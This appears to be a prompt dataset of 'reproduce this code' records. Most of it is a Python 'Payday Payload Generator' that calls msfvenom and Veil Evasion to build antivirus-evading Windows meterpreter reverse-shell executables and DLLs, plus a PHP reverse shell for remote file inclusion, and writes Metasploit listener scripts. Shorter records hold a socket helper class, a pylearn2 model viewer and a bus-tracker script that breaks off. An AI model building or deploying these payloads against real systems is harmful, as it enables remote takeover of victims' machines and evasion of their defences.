parms[0]\n\t\tlport = str(parms[1])\n\t\toutput_type = parms[2]\n\t\text = parms[3]\n\t\tbase = output_dir\n\t\tvenom_cmd = \"msfvenom -p \" + payload + \" LHOST=\" + ip + \" LPORT=\" + lport + \" -f \" + output_type + \" -o \" + base + ext\n\t\tprint(\"[!] Generating : \" + bluetxt(payload))\n\t\tprint(\"[>] LHOST \" + greentxt(ip) + \" on port \" + greentxt(lport))\n\t\tos.system(venom_cmd)\n # strip off ext and replace with .rc\n\t\tprint(\"[!] Generating handler for : \" + bluetxt(payload))\n\n\t\thandler = ext.split(\".\")[0] + \".rc\"\n\t\thandler_file = open(base + \"handlers/\" + handler , \"w+\")\n\t\thandler_file.write(\"use exploit/multi/handler\\n\")\n\t\thandler_file.write(\"set payload \" + payload +\"\\n\")\n\t\thandler_file.write(\"set LPORT \" + str(payload_port) + \"\\n\")\n\t\thandler_file.write(\"set LHOST \" + ip + \"\\n\")\n\t\thandler_file.write(\"set ExitOnSession False\\n\")\n\t\thandler_file.write(\"exploit -j -z\\n\")\n\t\thandler_file.close()\n\t\tprint(\"[!] Generated : \" + yellowtxt(handler) + \"\\n\\n\")\n\n\ndef veil_payloads(ip, output_dir, move_payloads, veil_path, payload_port):\n\t\"\"\" Takes local IP address as LHOST parm and builds Veil payloads\"\"\"\n\t# Veil doesn't have a custom output directory option and the default path gets pulled from the config file\n\t# hacky approach :: copy each generated payload and handler in to the custom output directory if it is supplied\n\t# start empty list to hold\n\tos.chdir(veil_path)\n\tpayloads = []\n\t# appends payloads with nested 3 value list for dynamic parm calling\n\tpayloads.append([\"10\",payload_port, \"v_revhttps\"])\n\tpayloads.append([\"5\",payload_port,\"v_revhttp\"])\n\tpayloads.append([\"7\",payload_port,\"v_revmet\"])\n\tpayloads.append([\"6\",payload_port, \"v_revhttp_srv\"])\n\n\tprint(\"Creating Veil Goodness\")\n\tfor parms in payloads:\n\t\tlhost = ip\n\t\tpayload = parms[0]\n\t\tlport = str(parms[1])\n\t\toutput = parms[2]\n\t\tcommand = (\"./Veil.py -t Evasion -p \" + payload + \" -c LHOST=\" + lhost + \" LPORT=\" + lport + \" -o \" + output + \" --ip \" + ip)\n\t\tos.system(command)\n\t\ttime.sleep(2)\n\t\t# if using a custom output directory, veil doesn't have an option to specify the base directory as it gets this from the conf file\n\t\t# payload generated above has unique 'base' name - access the list and check the boolean flag that is pushed in\n\t\t# if this is true, move the file/handler into the custom output directory so that all payloads are in custom location\n\t\tif move_payloads == True:\n\t\t\t# move payload\n\t\t\tos.system(\"mv /root/payloads/windows/\" + output + \".exe \" + output_dir)\n\t\t\tos.system(\"mv /root/payloads/windows/\" + output + \".dll \" + output_dir)\n\t\t\t# move handler\n\t\t\tos.system(\"mv /root/payloads/windows/handlers/\" + output + \"_handler.rc \" + output_dir + \"handlers\")\n\n\ndef php_payloads(ip, output_dir, payload_port):\n\t\"\"\" Creates PHP based raw shell and outputs as txt ready for RFI \"\"\"\n\tpayloads = []\n\tpayloads.append([\"php/meterpreter/reverse_tcp\", payload_port, \"raw\" ,\"pshell.txt\"])\n\t# TODO : push out the payload generation to a dedicated function to remove the code duplication\n\tfor parms in payloads:\n\t\tlhost = ip\n\t\tpayload = parms[0]\n\t\tlport = str(parms[1])\n\t\toutput_type = parms[2]\n\t\text = parms[3]\n\t\tbase = output_dir\n\t\tvenom_cmd = \"msfvenom -p \" + payload + \" LHOST=\" + ip + \" LPORT=\" + lport + \" -f \" + output_type + \" -o \" + base + ext\n\t\tprint(\"[!] Generating : \" + bluetxt(payload))\n\t\tos.system(venom_cmd)\n\t\tprint(\"[!] Generating handler for : \" + bluetxt(payload))\n\t\t# strip off ext and replace with .rc\n\n\t\thandler = ext.split(\".\")[0] + \".rc\"\n\t\thandler_file = open(base + \"handlers/\" + handler , \"w+\")\n\t\thandler_file.write(\"use exploit/multi/handler\\n\")\n\t\thandler_file.write(\"set payload \" + payload +\"\\n\")\n\t\thandler_file.write(\"set LPORT 443\\n\")\n\t\thandler_file.write(\"set LHOST \" + ip + \"\\n\")\n\t\thandler_file.write(\"set ExitOnSession False\\n\")\n\t\thandler_file.write(\"exploit -j -z\\n\")\n\t\thandler_file.close()\n\t\tprint(\"[!] Generated : \" + yellowtxt(handler) + \"\\n\\n\")\n\t\n\t# close this file and then move to backup - crazy stuff to get around read/write/edit locks\n\torig_file = str(base + ext)\n\tbackup_file = orig_file + '.bak'\n\tos.rename(orig_file, backup_file)\n\t# now open this file and remove the comments in php so that the file works\n\tholding = open(backup_file, 'r')\n\tnew_file = open(orig_file, 'w')\n\tlines = holding.readlines()\n\tfor line in lines: \n\t\tif line.startswith('/*<?php /**/'):\n\t\t\tline = line.replace('/*<?php /**/', '<?php')\n\t\t\tnew_file.write(line)\n\t\tnew_file.close()\n\tholding.close()\n\tos.remove(str(backup_file))\n\n\ndef clean(payload_path, veil_path):\n\t\"\"\" Cleans out directory \"\"\"\n\t# start with default Veil direcory - gets rid of hashes etc\n\tos.system(veil_path + \" --clean\")\n\tos.system(\"clear\")\n\tprint(yellowtxt(\"[!] Now cleaning default output directory\\n\"))\n\t# clean out generated payloads in default or custom directory\n\tfor file in os.listdir(payload_path):\n\t\tfile = payload_path + file\n\t\tif os.path.isfile(file):\n\t\t\tprint(\"[!] Removing \" + bluetxt(file))\n\t\t\tos.remove(file)\n\n\ndef get_payload_output(payload_output_dir):\n\t\"\"\" Builds directory structure if output option is supplied \"\"\"\n\toutput_dir = payload_output_dir\n\t# check to see if the trailing slash has been added to the path : ie /root/path\n\tif not output_dir.endswith(\"/\"):\n\t\toutput_dir = output_dir + \"/\"\n\n\t# creates the structure if it doesn't exist\n\tif not os.path.isdir(output_dir):\n\t\tprint(yellowtxt(\"[!] Creating output directory structure\"))\n\t\tos.mkdir(output_dir)\n\t\tos.chdir(output_dir)\n\t\tos.mkdir('handlers')\n\treturn output_dir\n\n\n\n###############################\n### \tHelper Function\t ###\n###############################\n\ndef redtxt(text2colour):\n\tredstart = \"\\033[0;31m\"\n\tredend = \"\\033[0m\"\n\treturn redstart + text2colour + redend\n\ndef greentxt(text2colour):\n\tgreenstart = \"\\033[0;32m\"\n\tgreenend = \"\\033[0m\"\n\treturn greenstart + text2colour + greenend\n\ndef yellowtxt(text2colour):\n\tyellowstart = \"\\033[0;33m\"\n\tyellowend = \"\\033[0m\"\n\treturn yellowstart + text2colour + yellowend\n\ndef bluetxt(text2colour):\n\tbluestart = \"\\033[0;34m\"\n\tblueend = \"\\033[0m\"\n\treturn bluestart + text2colour + blueend\n\n\n\n##############################\n##\t Main Function\t ###\n##############################\n\n\ndef Main():\n\t# program version\n\tversion = 1.0\n\tbanner()\n\tcurdir = os.path.dirname(__file__)\n\tveil_path = os.path.join(curdir, '/Veil/')\n #print veil_path\n\tdefault_path = '/root/payloads/windows'\n\n\tparser = argparse.ArgumentParser(description=\"Payday Payload Generator :: Takes the IP Address and then builds meterpreter windows payloads using msfvenom and veil. Outputs to '/root/payloads/windows/' by default.\")\n\tparser.add_argument(\"--veil\", action=\"store_true\", help='Veil Payloads')\n\tparser.add_argument(\"--msf\", action=\"store_true\", help='MSF Payloads > tcp/exe, tcp/http(s), exe-service, dll')\n\tparser.add_argument(\"--php\", action=\"store_true\", help='Creates PHP payload as txt file for LFI/RFI')\n\tparser.add_argument(\"--clean\", action=\"store_true\", help=\"Cleans out existing files in the output directory\")\n\tparser.add_argument(\"--output\", help=\"Specify new output directory.\")\n\tparser.add_argument(\"--ip\", help='Specify Local IP Address for reverse connections')\n\tparser.add_argument(\"--port\", help='Specify custom port for payloads. Defaults to 443')\t\n\n\t# counts the supplied number of arguments and prints help if they are missing\n\tif len(sys.argv)==1:\n\t\tparser.print_help()\n\t\tsys.exit(1)\n\n\targs = parser.parse_args()\n\n\t# default variable setup\n\tip = args.ip\n\toutput_dir = \"\"\n\tmove_payloads = False\n\tpayload_port = \"\"\n\t\n\t# port option override\n\tif args.port:\n\t\tpayload_port = args.port\n\telse:\n\t\tpayload_port = 443\n\n\t\n\t# set up default path\n\tif args.output:\n\t\toutput = args.output\n\t\toutput_dir = get_payload_output(output)\n\t\tmove_payloads = True\n\n\telse:\n\t\t# default directory output :: Veil config points to the this location\n\t\toutput_dir = \"/root/payloads/windows/\"\n\t\t# add check to see if this direcory exists and if not, create it\n\t\tif not os.path.isdir(output_dir):\n\t\t\tprint(bluetxt(\"[*] The default path : %s is missing\")) %output_dir\n\t\t\tprint(yellowtxt(\"[!] You need to create this default path\"))\n\t\t\tbuild_tree()\n\t\t\tprint(\"The following paths are configured in '/etc/veil/settings.py', these are the default output directories for veil payloads.\")\n\t\t\tparse_veil_config()\n\t\t\tsys.exit(1)\n\t\t\t#os.mkdir(output_dir)\n\t\t\t#os.chdir(output_dir)\n\t\t\t#os.mkdir('handlers')\n\n\tif args.veil:\n\t\tif not ip:\n\t\t\tprint(\"[!] IP address required with this payload option :: --veil --ip <Address>\")\n\t\telse:\n\t\t\tprint(yellowtxt(\"[!] Encoding Veil payloads\"))\n #TODO remove all the original source files in the source directory\n\t\t\tveil_payloads(ip ,output_dir, move_payloads, veil_path, payload_port)\n\n\n\tif args.msf:\n\t\tif not ip:\n\t\t\tprint(\"[!] IP address required with this payload option :: --msf --ip <Address>\")\n\t\telse:\n\t\t\tprint(yellowtxt(\"[!] Encoding MSF Payloads\"))\n\t\t\tmsf_payloads(ip, output_dir, payload_port)\n\n\n\tif args.php:\n\t\tif not ip:\n\t\t\tprint(\"[!] IP address required with this payload option :: --php --ip <Address>\")\n\t\telse:\n\t\t\tprint(yellowtxt(\"[!] Encoding PHP Payloads\"))\n\t\t\tphp_payloads(ip, output_dir, payload_port)\n\n\n\n\tif args.clean:\n\t\tif args.output:\n\t\t\toutput_dir = get_payload_output(output)\n\t\t\tprint(redtxt(\"Cleaning out Payload and Handler File directories in : \") + yellowtxt(output_dir))\n\t\t\tclean(output_dir, veil_script)\n\t\telse:\n\t\t\tpayload_paths = [\"/root/payloads/windows/\",\"/root/payloads/windows/handlers/\"]\n\t\t\tprint(redtxt(\"Cleaning out Payload and Handler File directories\"))\n\t\t\tfor payload_path in payload_paths:\n\t\t\t\tclean(payload_path, veil_path)\n\n\nif __name__ == \"__main__\":\n\tMain()\n```<|memory_end|>\nReplicate it verbatim.",
"role": "user"
}
] |
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author : Matt Lorentzen
# Twitter : @lorentzenman
import os, sys, time, argparse
def banner():
version = "part of the spiderweb"
banner = """
_
_ __ __ _ _ _ __| | __ _ _ _
| '_ \ / _` | | | |/ _` |/ _` | | | |
| |_) | (_| | |_| | (_| | (_| | |_| |
| .__/ \__,_|\__, |\__,_|\__,_|\__, |
|_| |___/ |___/
%s
""" %version
print(greentxt(banner))
def build_tree():
tree_structure = """
The following structure is needed for veil output
payloads
├── veil
│ ├── catapult
│ ├── pillage
│ └── source
└── windows
└── handlers
"""
print(greentxt(tree_structure))
def parse_veil_config():
""" Loads Veil Configuration file options from /etc/veil/settings.py """
# check for veil settings file
if not os.path.isfile('/etc/veil/settings.py'):
print(redtxt("[!] Cannot find the veil settings file. Please check Veil installation or install using setup.sh inside './Veil/setup/setup.sh' folder"))
else:
vf = open('/etc/veil/settings.py', 'r')
for line in vf.readlines():
if not line.startswith('#'):
if "PAYLOAD" in line:
print(line.strip())
print("\n")
vf.close()
# ----- [ Creating Payloads ] ----- #
def msf_payloads(ip, output_dir, payload_port):
# Payloads Dictionary
payloads = []
payloads.append(["windows/meterpreter/reverse_tcp",payload_port, "exe", "revmet.exe"])
payloads.append(["windows/x64/meterpreter/reverse_tcp", payload_port, "exe", "revmet64.exe"])
payloads.append(["windows/meterpreter/reverse_http",payload_port, "exe", "methttp.exe"])
payloads.append(["windows/meterpreter/reverse_https",payload_port, "exe", "methttps.exe"])
payloads.append(["windows/x64/meterpreter/reverse_tcp",payload_port, "exe-service" , "serv64.exe"])
payloads.append(["windows/meterpreter/reverse_tcp",payload_port, "exe-service" ,"serv.exe"])
payloads.append(["windows/meterpreter/reverse_tcp",payload_port, "dll", "revmetdll.dll"])
payloads.append(["windows/x64/meterpreter/reverse_tcp",payload_port, "dll", "revmetdll64.dll"])
payloads.append(["windows/x64/meterpreter/reverse_https", payload_port, "exe", "methttps64.exe"])
#./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe
for parms in payloads:
payload = parms[0]
lport = str(parms[1])
output_type = parms[2]
ext = parms[3]
base = output_dir
venom_cmd = "msfvenom -p " + payload + " LHOST=" + ip + " LPORT=" + lport + " -f " + output_type + " -o " + base + ext
print("[!] Generating : " + bluetxt(payload))
print("[>] LHOST " + greentxt(ip) + " on port " + greentxt(lport))
os.system(venom_cmd)
# strip off ext and replace with .rc
print("[!] Generating handler for : " + bluetxt(payload))
handler = ext.split(".")[0] + ".rc"
handler_file = open(base + "handlers/" + handler , "w+")
handler_file.write("use exploit/multi/handler\n")
handler_file.write("set payload " + payload +"\n")
handler_file.write("set LPORT " + str(payload_port) + "\n")
handler_file.write("set LHOST " + ip + "\n")
handler_file.write("set ExitOnSession False\n")
handler_file.write("exploit -j -z\n")
handler_file.close()
print("[!] Generated : " + yellowtxt(handler) + "\n\n")
def veil_payloads(ip, output_dir, move_payloads, veil_path, payload_port):
""" Takes local IP address as LHOST parm and builds Veil payloads"""
# Veil doesn't have a custom output directory option and the default path gets pulled from the config file
# hacky approach :: copy each generated payload and handler in to the custom output directory if it is supplied
# start empty list to hold
os.chdir(veil_path)
payloads = []
# appends payloads with nested 3 value list for dynamic parm calling
payloads.append(["10",payload_port, "v_revhttps"])
payloads.append(["5",payload_port,"v_revhttp"])
payloads.append(["7",payload_port,"v_revmet"])
payloads.append(["6",payload_port, "v_revhttp_srv"])
print("Creating Veil Goodness")
for parms in payloads:
lhost = ip
payload = parms[0]
lport = str(parms[1])
output = parms[2]
command = ("./Veil.py -t Evasion -p " + payload + " -c LHOST=" + lhost + " LPORT=" + lport + " -o " + output + " --ip " + ip)
os.system(command)
time.sleep(2)
# if using a custom output directory, veil doesn't have an option to specify the base directory as it gets this from the conf file
# payload generated above has unique 'base' name - access the list and check the boolean flag that is pushed in
# if this is true, move the file/handler into the custom output directory so that all payloads are in custom location
if move_payloads == True:
# move payload
os.system("mv /root/payloads/windows/" + output + ".exe " + output_dir)
os.system("mv /root/payloads/windows/" + output + ".dll " + output_dir)
# move handler
os.system("mv /root/payloads/windows/handlers/" + output + "_handler.rc " + output_dir + "handlers")
def php_payloads(ip, output_dir, payload_port):
""" Creates PHP based raw shell and outputs as txt ready for RFI """
payloads = []
payloads.append(["php/meterpreter/reverse_tcp", payload_port, "raw" ,"pshell.txt"])
# TODO : push out the payload generation to a dedicated function to remove the code duplication
for parms in payloads:
lhost = ip
payload = parms[0]
lport = str(parms[1])
output_type = parms[2]
ext = parms[3]
base = output_dir
venom_cmd = "msfvenom -p " + payload + " LHOST=" + ip + " LPORT=" + lport + " -f " + output_type + " -o " + base + ext
print("[!] Generating : " + bluetxt(payload))
os.system(venom_cmd)
print("[!] Generating handler for : " + bluetxt(payload))
# strip off ext and replace with .rc
handler = ext.split(".")[0] + ".rc"
handler_file = open(base + "handlers/" + handler , "w+")
handler_file.write("use exploit/multi/handler\n")
handler_file.write("set payload " + payload +"\n")
handler_file.write("set LPORT 443\n")
handler_file.write("set LHOST " + ip + "\n")
handler_file.write("set ExitOnSession False\n")
handler_file.write("exploit -j -z\n")
handler_file.close()
print("[!] Generated : " + yellowtxt(handler) + "\n\n")
# close this file and then move to backup - crazy stuff to get around read/write/edit locks
orig_file = str(base + ext)
backup_file = orig_file + '.bak'
os.rename(orig_file, backup_file)
# now open this file and remove the comments in php so that the file works
holding = open(backup_file, 'r')
new_file = open(orig_file, 'w')
lines = holding.readlines()
for line in lines:
if line.startswith('/*<?php /**/'):
line = line.replace('/*<?php /**/', '<?php')
new_file.write(line)
new_file.close()
holding.close()
os.remove(str(backup_file))
def clean(payload_path, veil_path):
""" Cleans out directory """
# start with default Veil direcory - gets rid of hashes etc
os.system(veil_path + " --clean")
os.system("clear")
print(yellowtxt("[!] Now cleaning default output directory\n"))
# clean out generated payloads in default or custom directory
for file in os.listdir(payload_path):
file = payload_path + file
if os.path.isfile(file):
print("[!] Removing " + bluetxt(file))
os.remove(file)
def get_payload_output(payload_output_dir):
""" Builds directory structure if output option is supplied """
output_dir = payload_output_dir
# check to see if the trailing slash has been added to the path : ie /root/path
if not output_dir.endswith("/"):
output_dir = output_dir + "/"
# creates the structure if it doesn't exist
if not os.path.isdir(output_dir):
print(yellowtxt("[!] Creating output directory structure"))
os.mkdir(output_dir)
os.chdir(output_dir)
os.mkdir('handlers')
return output_dir
###############################
### Helper Function ###
###############################
def redtxt(text2colour):
redstart = "\033[0;31m"
redend = "\033[0m"
return redstart + text2colour + redend
def greentxt(text2colour):
greenstart = "\033[0;32m"
greenend = "\033[0m"
return greenstart + text2colour + greenend
def yellowtxt(text2colour):
yellowstart = "\033[0;33m"
yellowend = "\033[0m"
return yellowstart + text2colour + yellowend
def bluetxt(text2colour):
bluestart = "\033[0;34m"
blueend = "\033[0m"
return bluestart + text2colour + blueend
##############################
## Main Function ###
##############################
def Main():
# program version
version = 1.0
banner()
curdir = os.path.dirname(__file__)
veil_path = os.path.join(curdir, '/Veil/')
#print veil_path
default_path = '/root/payloads/windows'
parser = argparse.ArgumentParser(description="Payday Payload Generator :: Takes the IP Address and then builds meterpreter windows payloads using msfvenom and veil. Outputs to '/root/payloads/windows/' by default.")
parser.add_argument("--veil", action="store_true", help='Veil Payloads')
parser.add_argument("--msf", action="store_true", help='MSF Payloads > tcp/exe, tcp/http(s), exe-service, dll')
parser.add_argument("--php", action="store_true", help='Creates PHP payload as txt file for LFI/RFI')
parser.add_argument("--clean", action="store_true", help="Cleans out existing files in the output directory")
parser.add_argument("--output", help="Specify new output directory.")
parser.add_argument("--ip", help='Specify Local IP Address for reverse connections')
parser.add_argument("--port", help='Specify custom port for payloads. Defaults to 443')
# counts the supplied number of arguments and prints help if they are missing
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
# default variable setup
ip = args.ip
output_dir = ""
move_payloads = False
payload_port = ""
# port option override
if args.port:
payload_port = args.port
else:
payload_port = 443
# set up default path
if args.output:
output = args.output
output_dir = get_payload_output(output)
move_payloads = True
else:
# default directory output :: Veil config points to the this location
output_dir = "/root/payloads/windows/"
# add check to see if this direcory exists and if not, create it
if not os.path.isdir(output_dir):
print(bluetxt("[*] The default path : %s is missing")) %output_dir
print(yellowtxt("[!] You need to create this default path"))
build_tree()
print("The following paths are configured in '/etc/veil/settings.py', these are the default output directories for veil payloads.")
parse_veil_config()
sys.exit(1)
#os.mkdir(output_dir)
#os.chdir(output_dir)
#os.mkdir('handlers')
if args.veil:
if not ip:
print("[!] IP address required with this payload option :: --veil --ip <Address>")
else:
print(yellowtxt("[!] Encoding Veil payloads"))
#TODO remove all the original source files in the source directory
veil_payloads(ip ,output_dir, move_payloads, veil_path, payload_port)
if args.msf:
if not ip:
print("[!] IP address required with this payload option :: --msf --ip <Address>")
else:
print(yellowtxt("[!] Encoding MSF Payloads"))
msf_payloads(ip, output_dir, payload_port)
if args.php:
if not ip:
print("[!] IP address required with this payload option :: --php --ip <Address>")
else:
print(yellowtxt("[!] Encoding PHP Payloads"))
php_payloads(ip, output_dir, payload_port)
if args.clean:
if args.output:
output_dir = get_payload_output(output)
print(redtxt("Cleaning out Payload and Handler File directories in : ") + yellowtxt(output_dir))
clean(output_dir, veil_script)
else:
payload_paths = ["/root/payloads/windows/","/root/payloads/windows/handlers/"]
print(redtxt("Cleaning out Payload and Handler File directories"))
for payload_path in payload_paths:
clean(payload_path, veil_path)
if __name__ == "__main__":
Main()
```
|
[
{
"content": "Reconstruct the code exactly:\n```python\n# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\nclass socket_protocol:\n def __init__(self):\n self.response = \"\"\n pass\n \n def pack_request(self, request):\n request_len = len(request) + 8\n package = '{:0>8}'.format(request_len)\n package += request\n return package\n \n def input_response(self, data):\n self.response += data\n \n def data_valid(self):\n if len(self.response) < 8:\n return False\n length = self.response[:8]\n if int(length) == len(self.response):\n return True\n else:\n return False\n \n def clear(self):\n self.response = \"\"\n \n def get_response(self):\n if False == self.data_valid():\n return \"\"\n return self.response[8:]\n\n \nif __name__ == \"__main__\":\n a = socket_protocol() \n a.input_response(a.pack_request(\"ssss\"))\n print a.get_response()\n```\nReturn the exact text.",
"role": "user"
}
] |
[
{
"content": "Reconstruct the code exactly:\n<|memory_start|>```python\n# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\nclass socket_protocol:\n def __init__(self):\n self.response = \"\"\n pass\n \n def pack_request(self, request):\n request_len = len(request) + 8\n package = '{:0>8}'.format(request_len)\n package += request\n return package\n \n def input_response(self, data):\n self.response += data\n \n def data_valid(self):\n if len(self.response) < 8:\n return False\n length = self.response[:8]\n if int(length) == len(self.response):\n return True\n else:\n return False\n \n def clear(self):\n self.response = \"\"\n \n def get_response(self):\n if False == self.data_valid():\n return \"\"\n return self.response[8:]\n\n \nif __name__ == \"__main__\":\n a = socket_protocol() \n a.input_response(a.pack_request(\"ssss\"))\n print a.get_response()\n```<|memory_end|>\nReturn the exact text.",
"role": "user"
}
] |
```python
# To change this license header, choose License Headers in Project Properties.
# To change this template file, choose Tools | Templates
# and open the template in the editor.
class socket_protocol:
def __init__(self):
self.response = ""
pass
def pack_request(self, request):
request_len = len(request) + 8
package = '{:0>8}'.format(request_len)
package += request
return package
def input_response(self, data):
self.response += data
def data_valid(self):
if len(self.response) < 8:
return False
length = self.response[:8]
if int(length) == len(self.response):
return True
else:
return False
def clear(self):
self.response = ""
def get_response(self):
if False == self.data_valid():
return ""
return self.response[8:]
if __name__ == "__main__":
a = socket_protocol()
a.input_response(a.pack_request("ssss"))
print a.get_response()
```
|
[
{
"content": "Repeat the full code snippet:\n```python\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThe application allows you to show the weights of a class\nthat inherits from pylearn2's Model.\n\nTo start, goto File > Open pickled model... and select the\nfile that has your saved mode. Loading might take a while\nand the window will look frozen while loading.\n\nOnce the model was loaded the parameters are presented in the\nlist on the left side. Select an entry to view the content for\nthat parameter.\n\nFor uni-dimensional values the program shows a simple,\nhistogram-like graph. For values with two dimensions and\nmore an image is presented.\n\nIf the value has more than two dimensions you can choose which\ndimensions are shown using the combo-boxed that are shown in the\nsecond vertical area next to list ov parameters.\n\nThe values shown in the image can be customized by adjusting\nthe treshold and chenging the way values are mapped to colors.\n\nExamples:\n\n # simply run the program\n python show_weights.py\n\n # run the app in debug mode\n python show_weights.py --debug\n\n # Load a file at start-up\n python show_weights.py file.pkl\n\n\"\"\"\n__authors__ = \"Nicu Tofan\"\n__copyright__ = \"Copyright 2015, Nicu Tofan\"\n__credits__ = [\"Nicu Tofan\"]\n__license__ = \"3-clause BSD\"\n__maintainer__ = \"Nicu Tofan\"\n__email__ = \"[email protected]\"\n\nimport sys\nimport logging\n\nfrom pyl2extra.utils.script import setup_logging, make_argument_parser\nfrom pyl2extra.gui.image_viewer import SettingsMixin\n\nCOMPANY = \"pyl2extra\"\nDOMAIN = \"pyl2extra.org\"\nAPPNAME = \"PYL2 Model Browser\"\n\ndef cmd_gui(args):\n \"\"\"\n Shows the main GUI interface\n \"\"\"\n from pyl2extra.gui.show_weights.main_window import MainWindow\n\n from PyQt4 import QtGui\n app = QtGui.QApplication(sys.argv)\n SettingsMixin.appSettings(DOMAIN, COMPANY, APPNAME)\n\n ex = MainWindow()\n ex.show()\n\n if len(args.model) > 0:\n ex.load_model_file(args.model)\n\n logging.debug(\"Application started\")\n sys.exit(app.exec_())\n\ndef main():\n \"\"\"\n Module entry point.\n \"\"\"\n\n # look at the arguments\n parser = make_argument_parser(\"Debugger for pylearn2 models.\")\n parser.add_argument('--model', default='')\n args = parser.parse_args()\n\n # prepare logging\n setup_logging(args)\n logging.debug(\"Application starting...\")\n\n # run based on request\n cmd_gui(args)\n logging.debug(\"Application ended\")\n\n\nif __name__ == '__main__':\n main()\n```\nOutput verbatim.",
"role": "user"
}
] |
[
{
"content": "Repeat the full code snippet:\n<|memory_start|>```python\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThe application allows you to show the weights of a class\nthat inherits from pylearn2's Model.\n\nTo start, goto File > Open pickled model... and select the\nfile that has your saved mode. Loading might take a while\nand the window will look frozen while loading.\n\nOnce the model was loaded the parameters are presented in the\nlist on the left side. Select an entry to view the content for\nthat parameter.\n\nFor uni-dimensional values the program shows a simple,\nhistogram-like graph. For values with two dimensions and\nmore an image is presented.\n\nIf the value has more than two dimensions you can choose which\ndimensions are shown using the combo-boxed that are shown in the\nsecond vertical area next to list ov parameters.\n\nThe values shown in the image can be customized by adjusting\nthe treshold and chenging the way values are mapped to colors.\n\nExamples:\n\n # simply run the program\n python show_weights.py\n\n # run the app in debug mode\n python show_weights.py --debug\n\n # Load a file at start-up\n python show_weights.py file.pkl\n\n\"\"\"\n__authors__ = \"Nicu Tofan\"\n__copyright__ = \"Copyright 2015, Nicu Tofan\"\n__credits__ = [\"Nicu Tofan\"]\n__license__ = \"3-clause BSD\"\n__maintainer__ = \"Nicu Tofan\"\n__email__ = \"[email protected]\"\n\nimport sys\nimport logging\n\nfrom pyl2extra.utils.script import setup_logging, make_argument_parser\nfrom pyl2extra.gui.image_viewer import SettingsMixin\n\nCOMPANY = \"pyl2extra\"\nDOMAIN = \"pyl2extra.org\"\nAPPNAME = \"PYL2 Model Browser\"\n\ndef cmd_gui(args):\n \"\"\"\n Shows the main GUI interface\n \"\"\"\n from pyl2extra.gui.show_weights.main_window import MainWindow\n\n from PyQt4 import QtGui\n app = QtGui.QApplication(sys.argv)\n SettingsMixin.appSettings(DOMAIN, COMPANY, APPNAME)\n\n ex = MainWindow()\n ex.show()\n\n if len(args.model) > 0:\n ex.load_model_file(args.model)\n\n logging.debug(\"Application started\")\n sys.exit(app.exec_())\n\ndef main():\n \"\"\"\n Module entry point.\n \"\"\"\n\n # look at the arguments\n parser = make_argument_parser(\"Debugger for pylearn2 models.\")\n parser.add_argument('--model', default='')\n args = parser.parse_args()\n\n # prepare logging\n setup_logging(args)\n logging.debug(\"Application starting...\")\n\n # run based on request\n cmd_gui(args)\n logging.debug(\"Application ended\")\n\n\nif __name__ == '__main__':\n main()\n```<|memory_end|>\nOutput verbatim.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The application allows you to show the weights of a class
that inherits from pylearn2's Model.
To start, goto File > Open pickled model... and select the
file that has your saved mode. Loading might take a while
and the window will look frozen while loading.
Once the model was loaded the parameters are presented in the
list on the left side. Select an entry to view the content for
that parameter.
For uni-dimensional values the program shows a simple,
histogram-like graph. For values with two dimensions and
more an image is presented.
If the value has more than two dimensions you can choose which
dimensions are shown using the combo-boxed that are shown in the
second vertical area next to list ov parameters.
The values shown in the image can be customized by adjusting
the treshold and chenging the way values are mapped to colors.
Examples:
# simply run the program
python show_weights.py
# run the app in debug mode
python show_weights.py --debug
# Load a file at start-up
python show_weights.py file.pkl
"""
__authors__ = "Nicu Tofan"
__copyright__ = "Copyright 2015, Nicu Tofan"
__credits__ = ["Nicu Tofan"]
__license__ = "3-clause BSD"
__maintainer__ = "Nicu Tofan"
__email__ = "[email protected]"
import sys
import logging
from pyl2extra.utils.script import setup_logging, make_argument_parser
from pyl2extra.gui.image_viewer import SettingsMixin
COMPANY = "pyl2extra"
DOMAIN = "pyl2extra.org"
APPNAME = "PYL2 Model Browser"
def cmd_gui(args):
"""
Shows the main GUI interface
"""
from pyl2extra.gui.show_weights.main_window import MainWindow
from PyQt4 import QtGui
app = QtGui.QApplication(sys.argv)
SettingsMixin.appSettings(DOMAIN, COMPANY, APPNAME)
ex = MainWindow()
ex.show()
if len(args.model) > 0:
ex.load_model_file(args.model)
logging.debug("Application started")
sys.exit(app.exec_())
def main():
"""
Module entry point.
"""
# look at the arguments
parser = make_argument_parser("Debugger for pylearn2 models.")
parser.add_argument('--model', default='')
args = parser.parse_args()
# prepare logging
setup_logging(args)
logging.debug("Application starting...")
# run based on request
cmd_gui(args)
logging.debug("Application ended")
if __name__ == '__main__':
main()
```
|
[
{
"content": "Here is some code:\n```python\n#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# CTA API CLI YAH\n\nimport sys\nimport requests\n#from bs4 import BeautifulSoup\nfrom xmltodict import parse\nimport datetime\nfrom time import gmtime, strftime\n# enable debugging\nimport cgitb\ncgitb.enable()\n\n# get API key from file\nf = open('./.cta-api.key', 'r')\nAPIKEY = \"?key=\" + f.read(25)\nf.close()\n\nURL=\"http://www.ctabustracker.com/bustime/api/v1/\"\napicmd = \"getpredictions\"\n\nshowResponse = [\"stpnm\",\"stpid\",\"vid\",\"rt\",\"rtdir\",\"prdtm\"]\n\ndef getPred(localurl):\n r = requests.get(localurl)\n out = parse(r.text)\n if \"error\" in out['bustime-response']:\n #print \"+\" + str(out) + \"+\"\n #print \"localurl: \" + str(localurl)\n print \"xXxXxXx\\nERROR: \" + out['bustime-response']['error']['msg']\n print \"xXxXxXx\\n\"\n #sys.exit(1)\n return\n print \"___\"\n # Lame safety check:\n if \"prdtm\" in out['bustime-response']['prd']:\n #print \"tmpstmp: \" + out['bustime-response']['prd']['tmstmp']\n for x in showResponse:\n print x + \": \" + out['bustime-response']['prd'][x] \n #out['bustime-response']['prd']:\n #print key\n #print x\n \n # true == multiple predictions returned\n if 